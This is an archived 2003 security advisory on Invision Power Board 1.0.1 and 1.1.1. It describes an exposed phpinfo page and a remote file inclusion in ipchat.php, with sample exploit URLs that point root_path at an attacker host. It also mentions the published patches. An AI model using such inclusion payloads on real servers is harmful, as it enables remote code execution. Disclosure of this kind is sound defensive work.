Informations : °°°°°°°°°°°°°° Website : http://www.invisionboard.com -------------------------- Version : 1.0.1 Problem : phpinfo() -------------------------- Version : 1.1.1 Problem : File Including PHP Code/Location : °°°°°°°°°°°°°°°°°°° v1.0.1 : phpinfo.php : ---------- <?php phpinfo(); ?> ---------- v1.1.1 : ipchat.php : ------------------------------------- require $root_path."conf_global.php"; ------------------------------------- (this is a hole if register_globals=ON) Exploits : °°°°°°°°°° v1.0.1 : http://[target]/phpinfo.php v1.1.1 : http://[target]/ipchat.php?root_path=http://[attacker]/ with : http://[attacker]/conf_global.php Patchs : °°°°°°°° Patchs for both versions has been published on http://www.phpsecure.org . More Details : °°°°°°°°°°°°°° In French : http://www.frog-man.org/tutos/InvisionPowerBoard.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FInvisionPowerBoard.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools frog-m@n _________________________________________________________________ Recevez vos e-mails MSN Hotmail par SMS sur votre GSM ! http://www.fr.msn.be/gsm/servicesms/hotmailparsms
This archive was generated by hypermail 2b30 : Thu Feb 27 2003 - 11:56:15 PST